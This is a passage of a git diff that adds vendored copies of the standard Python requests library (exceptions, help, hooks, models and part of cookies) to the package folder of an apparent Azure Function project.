cookie_dict[name])) + + return cookiejar + + +def merge_cookies(cookiejar, cookies): + """Add cookies to cookiejar and returns a merged CookieJar. + + :param cookiejar: CookieJar object to add the cookies to. + :param cookies: Dictionary or CookieJar object to be added. + :rtype: CookieJar + """ + if not isinstance(cookiejar, cookielib.CookieJar): + raise ValueError("You can only merge into CookieJar") + + if isinstance(cookies, dict): + cookiejar = cookiejar_from_dict(cookies, cookiejar=cookiejar, overwrite=False) + elif isinstance(cookies, cookielib.CookieJar): + try: + cookiejar.update(cookies) + except AttributeError: + for cookie_in_jar in cookies: + cookiejar.set_cookie(cookie_in_jar) + + return cookiejar diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/exceptions.py new file mode 100644 index 0000000..429e76f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/exceptions.py @@ -0,0 +1,141 @@ +""" +requests.exceptions +~~~~~~~~~~~~~~~~~~~ + +This module contains the set of Requests' exceptions. +""" +from urllib3.exceptions import HTTPError as BaseHTTPError + +from .compat import JSONDecodeError as CompatJSONDecodeError + + +class RequestException(IOError): + """There was an ambiguous exception that occurred while handling your + request. + """ + + def __init__(self, *args, **kwargs): + """Initialize RequestException with `request` and `response` objects.""" + response = kwargs.pop("response", None) + self.response = response + self.request = kwargs.pop("request", None) + if response is not None and not self.request and hasattr(response, "request"): + self.request = self.response.request + super().__init__(*args, **kwargs) + + +class InvalidJSONError(RequestException): + """A JSON error occurred.""" + + +class JSONDecodeError(InvalidJSONError, CompatJSONDecodeError): + """Couldn't decode the text into json""" + + def __init__(self, *args, **kwargs): + """ + Construct the JSONDecodeError instance first with all + args. Then use it's args to construct the IOError so that + the json specific args aren't used as IOError specific args + and the error message from JSONDecodeError is preserved. + """ + CompatJSONDecodeError.__init__(self, *args) + InvalidJSONError.__init__(self, *self.args, **kwargs) + + +class HTTPError(RequestException): + """An HTTP error occurred.""" + + +class ConnectionError(RequestException): + """A Connection error occurred.""" + + +class ProxyError(ConnectionError): + """A proxy error occurred.""" + + +class SSLError(ConnectionError): + """An SSL error occurred.""" + + +class Timeout(RequestException): + """The request timed out. + + Catching this error will catch both + :exc:`~requests.exceptions.ConnectTimeout` and + :exc:`~requests.exceptions.ReadTimeout` errors. + """ + + +class ConnectTimeout(ConnectionError, Timeout): + """The request timed out while trying to connect to the remote server. + + Requests that produced this error are safe to retry. + """ + + +class ReadTimeout(Timeout): + """The server did not send any data in the allotted amount of time.""" + + +class URLRequired(RequestException): + """A valid URL is required to make a request.""" + + +class TooManyRedirects(RequestException): + """Too many redirects.""" + + +class MissingSchema(RequestException, ValueError): + """The URL scheme (e.g. http or https) is missing.""" + + +class InvalidSchema(RequestException, ValueError): + """The URL scheme provided is either invalid or unsupported.""" + + +class InvalidURL(RequestException, ValueError): + """The URL provided was somehow invalid.""" + + +class InvalidHeader(RequestException, ValueError): + """The header value provided was somehow invalid.""" + + +class InvalidProxyURL(InvalidURL): + """The proxy URL provided is invalid.""" + + +class ChunkedEncodingError(RequestException): + """The server declared chunked encoding but sent an invalid chunk.""" + + +class ContentDecodingError(RequestException, BaseHTTPError): + """Failed to decode response content.""" + + +class StreamConsumedError(RequestException, TypeError): + """The content for this response was already consumed.""" + + +class RetryError(RequestException): + """Custom retries logic failed""" + + +class UnrewindableBodyError(RequestException): + """Requests encountered an error when trying to rewind a body.""" + + +# Warnings + + +class RequestsWarning(Warning): + """Base warning for Requests.""" + + +class FileModeWarning(RequestsWarning, DeprecationWarning): + """A file was opened in text mode, but Requests determined its binary length.""" + + +class RequestsDependencyWarning(RequestsWarning): + """An imported dependency doesn't match the expected version range.""" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/help.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/help.py new file mode 100644 index 0000000..c6aae71 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/help.py @@ -0,0 +1,134 @@ +"""Module containing bug report helper(s).""" + +import json +import platform +import ssl +import sys + +import idna +import urllib3 + +from . import __version__ as requests_version + +try: + import charset_normalizer +except ImportError: + charset_normalizer = None + +try: + import chardet +except ImportError: + chardet = None + +try: + from urllib3.contrib import pyopenssl +except ImportError: + pyopenssl = None + OpenSSL = None + cryptography = None +else: + import cryptography + import OpenSSL + + +def _implementation(): + """Return a dict with the Python implementation and version. + + Provide both the name and the version of the Python implementation + currently running. For example, on CPython 3.10.3 it will return + {'name': 'CPython', 'version': '3.10.3'}. + + This function works best on CPython and PyPy: in particular, it probably + doesn't work for Jython or IronPython. Future investigation should be done + to work out the correct shape of the code for those platforms. + """ + implementation = platform.python_implementation() + + if implementation == "CPython": + implementation_version = platform.python_version() + elif implementation == "PyPy": + implementation_version = "{}.{}.{}".format( + sys.pypy_version_info.major, + sys.pypy_version_info.minor, + sys.pypy_version_info.micro, + ) + if sys.pypy_version_info.releaselevel != "final": + implementation_version = "".join( + [implementation_version, sys.pypy_version_info.releaselevel] + ) + elif implementation == "Jython": + implementation_version = platform.python_version() # Complete Guess + elif implementation == "IronPython": + implementation_version = platform.python_version() # Complete Guess + else: + implementation_version = "Unknown" + + return {"name": implementation, "version": implementation_version} + + +def info(): + """Generate information for a bug report.""" + try: + platform_info = { + "system": platform.system(), + "release": platform.release(), + } + except OSError: + platform_info = { + "system": "Unknown", + "release": "Unknown", + } + + implementation_info = _implementation() + urllib3_info = {"version": urllib3.__version__} + charset_normalizer_info = {"version": None} + chardet_info = {"version": None} + if charset_normalizer: + charset_normalizer_info = {"version": charset_normalizer.__version__} + if chardet: + chardet_info = {"version": chardet.__version__} + + pyopenssl_info = { + "version": None, + "openssl_version": "", + } + if OpenSSL: + pyopenssl_info = { + "version": OpenSSL.__version__, + "openssl_version": f"{OpenSSL.SSL.OPENSSL_VERSION_NUMBER:x}", + } + cryptography_info = { + "version": getattr(cryptography, "__version__", ""), + } + idna_info = { + "version": getattr(idna, "__version__", ""), + } + + system_ssl = ssl.OPENSSL_VERSION_NUMBER + system_ssl_info = {"version": f"{system_ssl:x}" if system_ssl is not None else ""} + + return { + "platform": platform_info, + "implementation": implementation_info, + "system_ssl": system_ssl_info, + "using_pyopenssl": pyopenssl is not None, + "using_charset_normalizer": chardet is None, + "pyOpenSSL": pyopenssl_info, + "urllib3": urllib3_info, + "chardet": chardet_info, + "charset_normalizer": charset_normalizer_info, + "cryptography": cryptography_info, + "idna": idna_info, + "requests": { + "version": requests_version, + }, + } + + +def main(): + """Pretty-print the bug information as JSON.""" + print(json.dumps(info(), sort_keys=True, indent=2)) + + +if __name__ == "__main__": + main() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/hooks.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/hooks.py new file mode 100644 index 0000000..4b11bcc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/hooks.py @@ -0,0 +1,33 @@ +""" +requests.hooks +~~~~~~~~~~~~~~ + +This module provides the capabilities for the Requests hooks system. + +Available hooks: + +``response``: + The response generated from a Request. +""" +HOOKS = ["response"] + + +def default_hooks(): + return {event: [] for event in HOOKS} + + +# TODO: response is the only one + + +def dispatch_hook(key, hooks, hook_data, **kwargs): + """Dispatches a hook dictionary on a given piece of data.""" + hooks = hooks or {} + hooks = hooks.get(key) + if hooks: + if hasattr(hooks, "__call__"): + hooks = [hooks] + for hook in hooks: + _hook_data = hook(hook_data, **kwargs) + if _hook_data is not None: + hook_data = _hook_data + return hook_data diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/models.py new file mode 100644 index 0000000..82b781c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/models.py @@ -0,0 +1,1034 @@ +""" +requests.models +~~~~~~~~~~~~~~~ + +This module contains the primary objects that power Requests. +""" + +import datetime + +# Import encoding now, to avoid implicit import later. +# Implicit import within threads may cause LookupError when standard library is in a ZIP, +# such as in Embedded Python. See https://github.com/psf/requests/issues/3578. +import encodings.idna # noqa: F401 +from io import UnsupportedOperation + +from urllib3.exceptions import ( + DecodeError, + LocationParseError, + ProtocolError, + ReadTimeoutError, + SSLError, +) +from urllib3.fields import RequestField +from urllib3.filepost import encode_multipart_formdata +from urllib3.util import parse_url + +from ._internal_utils import to_native_string, unicode_is_ascii +from .auth import HTTPBasicAuth +from .compat import ( + Callable, + JSONDecodeError, + Mapping, + basestring, + builtin_str, + chardet, + cookielib, +) +from .compat import json as complexjson +from .compat import urlencode, urlsplit, urlunparse +from .cookies import _copy_cookie_jar, cookiejar_from_dict, get_cookie_header +from .exceptions import ( + ChunkedEncodingError, + ConnectionError, + ContentDecodingError, + HTTPError, + InvalidJSONError, + InvalidURL, +) +from .exceptions import JSONDecodeError as RequestsJSONDecodeError +from .exceptions import MissingSchema +from .exceptions import SSLError as RequestsSSLError +from .exceptions import StreamConsumedError +from .hooks import default_hooks +from .status_codes import codes +from .structures import CaseInsensitiveDict +from .utils import ( + check_header_validity, + get_auth_from_url, + guess_filename, + guess_json_utf, + iter_slices, + parse_header_links, + requote_uri, + stream_decode_response_unicode, + super_len, + to_key_val_list, +) + +#: The set of HTTP status codes that indicate an automatically +#: processable redirect. +REDIRECT_STATI = ( + codes.moved, # 301 + codes.found, # 302 + codes.other, # 303 + codes.temporary_redirect, # 307 + codes.permanent_redirect, # 308 +) + +DEFAULT_REDIRECT_LIMIT = 30 +CONTENT_CHUNK_SIZE = 10 * 1024 +ITER_CHUNK_SIZE = 512 + + +class RequestEncodingMixin: + @property + def path_url(self): + """Build the path URL to use.""" + + url = [] + + p = urlsplit(self.url) + + path = p.path + if not path: + path = "/" + + url.append(path) + + query = p.query + if query: + url.append("?") + url.append(query) + + return "".join(url) + + @staticmethod + def _encode_params(data): + """Encode parameters in a piece of data. + + Will successfully encode parameters when passed as a dict or a list of + 2-tuples. Order is retained if data is a list of 2-tuples but arbitrary + if parameters are supplied as a dict. + """ + + if isinstance(data, (str, bytes)): + return data + elif hasattr(data, "read"): + return data + elif hasattr(data, "__iter__"): + result = [] + for k, vs in to_key_val_list(data): + if isinstance(vs, basestring) or not hasattr(vs, "__iter__"): + vs = [vs] + for v in vs: + if v is not None: + result.append( + ( + k.encode("utf-8") if isinstance(k, str) else k, + v.encode("utf-8") if isinstance(v, str) else v, + ) + ) + return urlencode(result, doseq=True) + else: + return data + + @staticmethod + def _encode_files(files, data): + """Build the body for a multipart/form-data request. + + Will successfully encode files when passed as a dict or a list of + tuples. Order is retained if data is a list of tuples but arbitrary + if parameters are supplied as a dict. + The tuples may be 2-tuples (filename, fileobj), 3-tuples (filename, fileobj, contentype) + or 4-tuples (filename, fileobj, contentype, custom_headers). + """ + if not files: + raise ValueError("Files must be provided.") + elif isinstance(data, basestring): + raise ValueError("Data must not be a string.") + + new_fields = [] + fields = to_key_val_list(data or {}) + files = to_key_val_list(files or {}) + + for field, val in fields: + if isinstance(val, basestring) or not hasattr(val, "__iter__"): + val = [val] + for v in val: + if v is not None: + # Don't call str() on bytestrings: in Py3 it all goes wrong. + if not isinstance(v, bytes): + v = str(v) + + new_fields.append( + ( + field.decode("utf-8") + if isinstance(field, bytes) + else field, + v.encode("utf-8") if isinstance(v, str) else v, + ) + ) + + for (k, v) in files: + # support for explicit filename + ft = None + fh = None + if isinstance(v, (tuple, list)): + if len(v) == 2: + fn, fp = v + elif len(v) == 3: + fn, fp, ft = v + else: + fn, fp, ft, fh = v + else: + fn = guess_filename(v) or k + fp = v + + if isinstance(fp, (str, bytes, bytearray)): + fdata = fp + elif hasattr(fp, "read"): + fdata = fp.read() + elif fp is None: + continue + else: + fdata = fp + + rf = RequestField(name=k, data=fdata, filename=fn, headers=fh) + rf.make_multipart(content_type=ft) + new_fields.append(rf) + + body, content_type = encode_multipart_formdata(new_fields) + + return body, content_type + + +class RequestHooksMixin: + def register_hook(self, event, hook): + """Properly register a hook.""" + + if event not in self.hooks: + raise ValueError(f'Unsupported event specified, with event name "{event}"') + + if isinstance(hook, Callable): + self.hooks[event].append(hook) + elif hasattr(hook, "__iter__"): + self.hooks[event].extend(h for h in hook if isinstance(h, Callable)) + + def deregister_hook(self, event, hook): + """Deregister a previously registered hook. + Returns True if the hook existed, False if not. + """ + + try: + self.hooks[event].remove(hook) + return True + except ValueError: + return False + + +class Request(RequestHooksMixin): + """A user-created :class:`Request ` object. + + Used to prepare a :class:`PreparedRequest `, which is sent to the server. + + :param method: HTTP method to use. + :param url: URL to send. + :param headers: dictionary of headers to send. + :param files: dictionary of {filename: fileobject} files to multipart upload. + :param data: the body to attach to the request. If a dictionary or + list of tuples ``[(key, value)]`` is provided, form-encoding will + take place. + :param json: json for the body to attach to the request (if files or data is not specified). + :param params: URL parameters to append to the URL. If a dictionary or + list of tuples ``[(key, value)]`` is provided, form-encoding will + take place. + :param auth: Auth handler or (user, pass) tuple. + :param cookies: dictionary or CookieJar of cookies to attach to this request. + :param hooks: dictionary of callback hooks, for internal usage. + + Usage:: + + >>> import requests + >>> req = requests.Request('GET', 'https://httpbin.org/get') + >>> req.prepare() + + """ + + def __init__( + self, + method=None, + url=None, + headers=None, + files=None, + data=None, + params=None, + auth=None, + cookies=None, + hooks=None, + json=None, + ): + + # Default empty dicts for dict params. + data = [] if data is None else data + files = [] if files is None else files + headers = {} if headers is None else headers + params = {} if params is None else params + hooks = {} if hooks is None else hooks + + self.hooks = default_hooks() + for (k, v) in list(hooks.items()): + self.register_hook(event=k, hook=v) + + self.method = method + self.url = url + self.headers = headers + self.files = files + self.data = data + self.json = json + self.params = params + self.auth = auth + self.cookies = cookies + + def __repr__(self): + return f"" + + def prepare(self): + """Constructs a :class:`PreparedRequest ` for transmission and returns it.""" + p = PreparedRequest() + p.prepare( + method=self.method, + url=self.url, + headers=self.headers, + files=self.files, + data=self.data, + json=self.json, + params=self.params, + auth=self.auth, + cookies=self.cookies, + hooks=self.hooks, + ) + return p + + +class PreparedRequest(RequestEncodingMixin, RequestHooksMixin): + """The fully mutable :class:`PreparedRequest ` object, + containing the exact bytes that will be sent to the server. + + Instances are generated from a :class:`Request ` object, and + should not be instantiated manually; doing so may produce undesirable + effects. + + Usage:: + + >>> import requests + >>> req = requests.Request('GET', 'https://httpbin.org/get') + >>> r = req.prepare() + >>> r + + + >>> s = requests.Session() + >>> s.send(r) + + """ + + def __init__(self): + #: HTTP verb to send to the server. + self.method = None + #: HTTP URL to send the request to. + self.url = None + #: dictionary of HTTP headers. + self.headers = None + # The `CookieJar` used to create the Cookie header will be stored here + # after prepare_cookies is called + self._cookies = None + #: request body to send to the server. + self.body = None + #: dictionary of callback hooks, for internal usage. + self.hooks = default_hooks() + #: integer denoting starting position of a readable file-like body. + self._body_position = None + + def prepare( + self, + method=None, + url=None, + headers=None, + files=None, + data=None, + params=None, + auth=None, + cookies=None, + hooks=None, + json=None, + ): + """Prepares the entire request with the given parameters.""" + + self.prepare_method(method) + self.prepare_url(url, params) + self.prepare_headers(headers) + self.prepare_cookies(cookies) + self.prepare_body(data, files, json) + self.prepare_auth(auth, url) + + # Note that prepare_auth must be last to enable authentication schemes + # such as OAuth to work on a fully prepared request. + + # This MUST go after prepare_auth. Authenticators could add a hook + self.prepare_hooks(hooks) + + def __repr__(self): + return f"" + + def copy(self): + p = PreparedRequest() + p.method = self.method + p.url = self.url + p.headers = self.headers.copy() if self.headers is not None else None + p._cookies = _copy_cookie_jar(self._cookies) + p.body = self.body + p.hooks = self.hooks + p._body_position = self._body_position + return p + + def prepare_method(self, method): + """Prepares the given HTTP method.""" + self.method = method + if self.method is not None: + self.method = to_native_string(self.method.upper()) + + @staticmethod + def _get_idna_encoded_host(host): + import idna + + try: + host = idna.encode(host, uts46=True).decode("utf-8") + except idna.IDNAError: + raise UnicodeError + return host + + def prepare_url(self, url, params): + """Prepares the given HTTP URL.""" + #: Accept objects that have string representations. + #: We're unable to blindly call unicode/str functions + #: as this will include the bytestring indicator (b'') + #: on python 3.x. + #: https://github.com/psf/requests/pull/2238 + if isinstance(url, bytes): + url = url.decode("utf8") + else: + url = str(url) + + # Remove leading whitespaces from url + url = url.lstrip() + + # Don't do any URL preparation for non-HTTP schemes like `mailto`, + # `data` etc to work around exceptions from `url_parse`, which + # handles RFC 3986 only. + if ":" in url and not url.lower().startswith("http"): + self.url = url + return + + # Support for unicode domain names and paths. + try: + scheme, auth, host, port, path, query, fragment = parse_url(url) + except LocationParseError as e: + raise InvalidURL(*e.args) + + if not scheme: + raise MissingSchema( + f"Invalid URL {url!r}: No scheme supplied. " + f"Perhaps you meant http://{url}?" + ) + + if not host: + raise InvalidURL(f"Invalid URL {url!r}: No host supplied") + + # In general, we want to try IDNA encoding the hostname if the string contains + # non-ASCII characters. This allows users to automatically get the correct IDNA + # behaviour. For strings containing only ASCII characters, we need to also verify + # it doesn't start with a wildcard (*), before allowing the unencoded hostname. + if not unicode_is_ascii(host): + try: + host = self._get_idna_encoded_host(host) + except UnicodeError: + raise InvalidURL("URL has an invalid label.") + elif host.startswith(("*", ".")): + raise InvalidURL("URL has an invalid label.") + + # Carefully reconstruct the network location + netloc = auth or "" + if netloc: + netloc += "@" + netloc += host + if port: + netloc += f":{port}" + + # Bare domains aren't valid URLs. + if not path: + path = "/" + + if isinstance(params, (str, bytes)): + params = to_native_string(params) + + enc_params = self._encode_params(params) + if enc_params: + if query: + query = f"{query}&{enc_params}" + else: + query = enc_params + + url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment])) + self.url = url + + def prepare_headers(self, headers): + """Prepares the given HTTP headers.""" + + self.headers = CaseInsensitiveDict() + if headers: + for header in headers.items(): + # Raise exception on invalid header value. + check_header_validity(header) + name, value = header + self.headers[to_native_string(name)] = value + + def prepare_body(self, data, files, json=None): + """Prepares the given HTTP body data.""" + + # Check if file, fo, generator, iterator. + # If not, run through normal process. + + # Nottin' on you. + body = None + content_type = None + + if not data and json is not None: + # urllib3 requires a bytes-like body. Python 2's json.dumps + # provides this natively, but Python 3 gives a Unicode string. + content_type = "application/json" + + try: + body = complexjson.dumps(json, allow_nan=False) + except ValueError as ve: + raise InvalidJSONError(ve, request=self) + + if not isinstance(body, bytes): + body = body.encode("utf-8") + + is_stream = all( + [ + hasattr(data, "__iter__"), + not isinstance(data, (basestring, list, tuple, Mapping)), + ] + ) + + if is_stream: + try: + length = super_len(data) + except (TypeError, AttributeError, UnsupportedOperation): + length = None + + body = data + + if getattr(body, "tell", None) is not None: + # Record the current file position before reading. + # This will allow us to rewind a file in the event + # of a redirect. + try: + self._body_position = body.tell() + except OSError: + # This differentiates from None, allowing us to catch + # a failed `tell()` later when trying to rewind the body + self._body_position = object() + + if files: + raise NotImplementedError( + "Streamed bodies and files are mutually exclusive." + ) + + if length: + self.headers["Content-Length"] = builtin_str(length) + else: + self.headers["Transfer-Encoding"] = "chunked" + else: + # Multi-part file uploads. + if files: + (body, content_type) = self._encode_files(files, data) + else: + if data: + body = self._encode_params(data) + if isinstance(data, basestring) or hasattr(data, "read"): + content_type = None + else: + content_type = "application/x-www-form-urlencoded" + + self.prepare_content_length(body) + + # Add content-type if it wasn't explicitly provided. + if content_type and ("content-type" not in self.headers): + self.headers["Content-Type"] = content_type + + self.body = body + + def prepare_content_length(self, body): + """Prepare Content-Length header based on request method and body""" + if body is not None: + length = super_len(body) + if length: + # If length exists, set it. Otherwise, we fallback + # to Transfer-Encoding: chunked. + self.headers["Content-Length"] = builtin_str(length) + elif ( + self.method not in ("GET", "HEAD") + and self.headers.get("Content-Length") is None + ): + # Set Content-Length to 0 for methods that can have a body + # but don't provide one. (i.e. not GET or HEAD) + self.headers["Content-Length"] = "0" + + def prepare_auth(self, auth, url=""): + """Prepares the given HTTP auth data.""" + + # If no Auth is explicitly provided, extract it from the URL first. + if auth is None: + url_auth = get_auth_from_url(self.url) + auth = url_auth if any(url_auth) else None + + if auth: + if isinstance(auth, tuple) and len(auth) == 2: + # special-case basic HTTP auth + auth = HTTPBasicAuth(*auth) + + # Allow auth to make its changes. + r = auth(self) + + # Update self to reflect the auth changes. + self.__dict__.update(r.__dict__) + + # Recompute Content-Length + self.prepare_content_length(self.body) + + def prepare_cookies(self, cookies): + """Prepares the given HTTP cookie data. + + This function eventually generates a ``Cookie`` header from the + given cookies using cookielib. Due to cookielib's design, the header + will not be regenerated if it already exists, meaning this function + can only be called once for the life of the + :class:`PreparedRequest ` object. Any subsequent calls + to ``prepare_cookies`` will have no actual effect, unless the "Cookie" + header is removed beforehand. + """ + if isinstance(cookies, cookielib.CookieJar): + self._cookies = cookies + else: + self._cookies = cookiejar_from_dict(cookies) + + cookie_header = get_cookie_header(self._cookies, self) + if cookie_header is not None: + self.headers["Cookie"] = cookie_header + + def prepare_hooks(self, hooks): + """Prepares the given hooks.""" + # hooks can be passed as None to the prepare method and to this + # method. To prevent iterating over None, simply use an empty list + # if hooks is False-y + hooks = hooks or [] + for event in hooks: + self.register_hook(event, hooks[event]) + + +class Response: + """The :class:`Response ` object, which contains a + server's response to an HTTP request. + """ + + __attrs__ = [ + "_content", + "status_code", + "headers", + "url", + "history", + "encoding", + "reason", + "cookies", + "elapsed", + "request", + ] + + def __init__(self): + self._content = False + self._content_consumed = False + self._next = None + + #: Integer Code of responded HTTP Status, e.g. 404 or 200. + self.status_code = None + + #: Case-insensitive Dictionary of Response Headers. + #: For example, ``headers['content-encoding']`` will return the + #: value of a ``'Content-Encoding'`` response header. + self.headers = CaseInsensitiveDict() + + #: File-like object representation of response (for advanced usage). + #: Use of ``raw`` requires that ``stream=True`` be set on the request. + #: This requirement does not apply for use internally to Requests. + self.raw = None + + #: Final URL location of Response. + self.url = None + + #: Encoding to decode with when accessing r.text. + self.encoding = None + + #: A list of :class:`Response ` objects from + #: the history of the Request. Any redirect responses will end + #: up here. The list is sorted from the oldest to the most recent request. + self.history = [] + + #: Textual reason of responded HTTP Status, e.g. "Not Found" or "OK". + self.reason = None + + #: A CookieJar of Cookies the server sent back. + self.cookies = cookiejar_from_dict({}) + + #: The amount of time elapsed between sending the request + #: and the arrival of the response (as a timedelta). + #: This property specifically measures the time taken between sending + #: the first byte of the request and finishing parsing the headers. It + #: is therefore unaffected by consuming the response content or the + #: value of the ``stream`` keyword argument. + self.elapsed = datetime.timedelta(0) + + #: The :class:`PreparedRequest ` object to which this + #: is a response. + self.request = None + + def __enter__(self): + return self + + def __exit__(self, *args): + self.close() + + def __getstate__(self): + # Consume everything; accessing the content attribute makes + # sure the content has been fully read. + if not self._content_consumed: + self.content + + return {attr: getattr(self, attr, None) for attr in self.__attrs__} + + def __setstate__(self, state): + for name, value in state.items(): + setattr(self, name, value) + + # pickled objects do not have .raw + setattr(self, "_content_consumed", True) + setattr(self, "raw", None) + + def __repr__(self): + return f"" + + def __bool__(self): + """Returns True if :attr:`status_code` is less than 400. + + This attribute checks if the status code of the response is between + 400 and 600 to see if there was a client error or a server error. If + the status code, is between 200 and 400, this will return True. This + is **not** a check to see if the response code is ``200 OK``. + """ + return self.ok + + def __nonzero__(self): + """Returns True if :attr:`status_code` is less than 400. + + This attribute checks if the status code of the response is between + 400 and 600 to see if there was a client error or a server error. If + the status code, is between 200 and 400, this will return True. This + is **not** a check to see if the response code is ``200 OK``. + """ + return self.ok + + def __iter__(self): + """Allows you to use a response as an iterator.""" + return self.iter_content(128) + + @property + def ok(self): + """Returns True if :attr:`status_code` is less than 400, False if not. + + This attribute checks if the status code of the response is between + 400 and 600 to see if there was a client error or a server error. If + the status code is between 200 and 400, this will return True. This + is **not** a check to see if the response code is ``200 OK``. + """ + try: + self.raise_for_status() + except HTTPError: + return False + return True + + @property + def is_redirect(self): + """True if this Response is a well-formed HTTP redirect that could have + been processed automatically (by :meth:`Session.resolve_redirects`). + """ + return "location" in self.headers and self.status_code in REDIRECT_STATI + + @property + def is_permanent_redirect(self): + """True if this Response one of the permanent versions of redirect.""" + return "location" in self.headers and self.status_code in ( + codes.moved_permanently, + codes.permanent_redirect, + ) + + @property + def next(self): + """Returns a PreparedRequest for the next request in a redirect chain, if there is one.""" + return self._next + + @property + def apparent_encoding(self): + """The apparent encoding, provided by the charset_normalizer or chardet libraries.""" + return chardet.detect(self.content)["encoding"] + + def iter_content(self, chunk_size=1, decode_unicode=False): + """Iterates over the response data. When stream=True is set on the + request, this avoids reading the content at once into memory for + large responses. The chunk size is the number of bytes it should + read into memory. This is not necessarily the length of each item + returned as decoding can take place. + + chunk_size must be of type int or None. A value of None will + function differently depending on the value of `stream`. + stream=True will read data as it arrives in whatever size the + chunks are received. If stream=False, data is returned as + a single chunk. + + If decode_unicode is True, content will be decoded using the best + available encoding based on the response. + """ + + def generate(): + # Special case for urllib3. + if hasattr(self.raw, "stream"): + try: + yield from self.raw.stream(chunk_size, decode_content=True) + except ProtocolError as e: + raise ChunkedEncodingError(e) + except DecodeError as e: + raise ContentDecodingError(e) + except ReadTimeoutError as e: + raise ConnectionError(e) + except SSLError as e: + raise RequestsSSLError(e) + else: + # Standard file-like object. + while True: + chunk = self.raw.read(chunk_size) + if not chunk: + break + yield chunk + + self._content_consumed = True + + if self._content_consumed and isinstance(self._content, bool): + raise StreamConsumedError() + elif chunk_size is not None and not isinstance(chunk_size, int): + raise TypeError( + f"chunk_size must be an int, it is instead a {type(chunk_size)}." + ) + # simulate reading small chunks of the content + reused_chunks = iter_slices(self._content, chunk_size) + + stream_chunks = generate() + + chunks = reused_chunks if self._content_consumed else stream_chunks + + if decode_unicode: + chunks = stream_decode_response_unicode(chunks, self) + + return chunks + + def iter_lines( + self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=False, delimiter=None + ): + """Iterates over the response data, one line at a time. When + stream=True is set on the request, this avoids reading the + content at once into memory for large responses. + + .. note:: This method is not reentrant safe. + """ + + pending = None + + for chunk in self.iter_content( + chunk_size=chunk_size, decode_unicode=decode_unicode + ): + + if pending is not None: + chunk = pending + chunk + + if delimiter: + lines = chunk.split(delimiter) + else: + lines = chunk.splitlines() + + if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]: + pending = lines.pop() + else: + pending = None + + yield from lines + + if pending is not None: + yield pending + + @property + def content(self): + """Content of the response, in bytes.""" + + if self._content is False: + # Read the contents. + if self._content_consumed: + raise RuntimeError("The content for this response was already consumed") + + if self.status_code == 0 or self.raw is None: + self._content = None + else: + self._content = b"".join(self.iter_content(CONTENT_CHUNK_SIZE)) or b"" + + self._content_consumed = True + # don't need to release the connection; that's been handled by urllib3 + # since we exhausted the data. + return self._content + + @property + def text(self): + """Content of the response, in unicode. + + If Response.encoding is None, encoding will be guessed using + ``charset_normalizer`` or ``chardet``. + + The encoding of the response content is determined based solely on HTTP + headers, following RFC 2616 to the letter. If you can take advantage of + non-HTTP knowledge to make a better guess at the encoding, you should + set ``r.encoding`` appropriately before accessing this property. + """ + + # Try charset from content-type + content = None + encoding = self.encoding + + if not self.content: + return "" + + # Fallback to auto-detected encoding. + if self.encoding is None: + encoding = self.apparent_encoding + + # Decode unicode from given encoding. + try: + content = str(self.content, encoding, errors="replace") + except (LookupError, TypeError): + # A LookupError is raised if the encoding was not found which could + # indicate a misspelling or similar mistake. + # + # A TypeError can be raised if encoding is None + # + # So we try blindly encoding. + content = str(self.content, errors="replace") + + return content + + def json(self, **kwargs): + r"""Returns the json-encoded content of a response, if any. + + :param \*\*kwargs: Optional arguments that ``json.loads`` takes. + :raises requests.exceptions.JSONDecodeError: If the response body does not + contain valid json. + """ + + if not self.encoding and self.content and len(self.content) > 3: + # No encoding set. JSON RFC 4627 section 3 states we should expect + # UTF-8, -16 or -32. Detect which one to use; If the detection or + # decoding fails, fall back to `self.text` (using charset_normalizer to make + # a best guess). + encoding = guess_json_utf(self.content) + if encoding is not None: + try: + return complexjson.loads(self.content.decode(encoding), **kwargs) + except UnicodeDecodeError: + # Wrong UTF codec detected; usually because it's not UTF-8 + # but some other 8-bit codec. This is an RFC violation, + # and the server didn't bother to tell us what codec *was* + # used. + pass + except JSONDecodeError as e: + raise RequestsJSONDecodeError(e.msg, e.doc, e.pos) + + try: + return complexjson.loads(self.text, **kwargs) + except JSONDecodeError as e: + # Catch JSON-related errors and raise as requests.JSONDecodeError + # This aliases json.JSONDecodeError and simplejson.JSONDecodeError + raise RequestsJSONDecodeError(e.msg, e.doc, e.pos) + + @property + def links(self): + """Returns the parsed header links of the response, if any.""" + + header = self.headers.get("link") + + resolved_links = {} + + if header: + links = parse_header_links(header) + + for link in links: + key = link.get("rel") or link.get("url") + resolved_links[key] = link + + return resolved_links + + def raise_for_status(self): + """Raises :class:`HTTPError`, if one occurred.""" + + http_error_msg = "" + if isinstance(self.reason, bytes): + # We attempt to decode utf-8 first because some servers + # choose to localize their reason strings. If the string + # isn't utf-8, we fall back to iso-8859-1 for all other + # encodings. (See PR #3538) + try: + reason = self.reason.decode("utf-8") + except UnicodeDecodeError: + reason = self.reason.decode("iso-8859-1") + else: + reason = self.reason + + if 400 <= self.status_code < 500: + http_error_msg = ( + f"{self.status_code} Client Error: {reason} for url: {self.url}" + ) + + elif 500 <= self.status_code < 600: + http_error_msg = ( + f"{self.status_code} Server Error: {reason} for url: {self.url}" + ) + + if http_error_msg: + raise HTTPError(http_error_msg, response=self) + + def close(self): + """Releases the connection back to the pool. Once this method has been + called the underlying ``raw`` object must not be accessed again. + + *Note: Should not normally need to be called explicitly.* + """ + if not self._content_consumed: + self.raw.close() + + release_conn = getattr(self.raw, "release_conn", None) + if release_conn is not None: + release_conn() diff --git 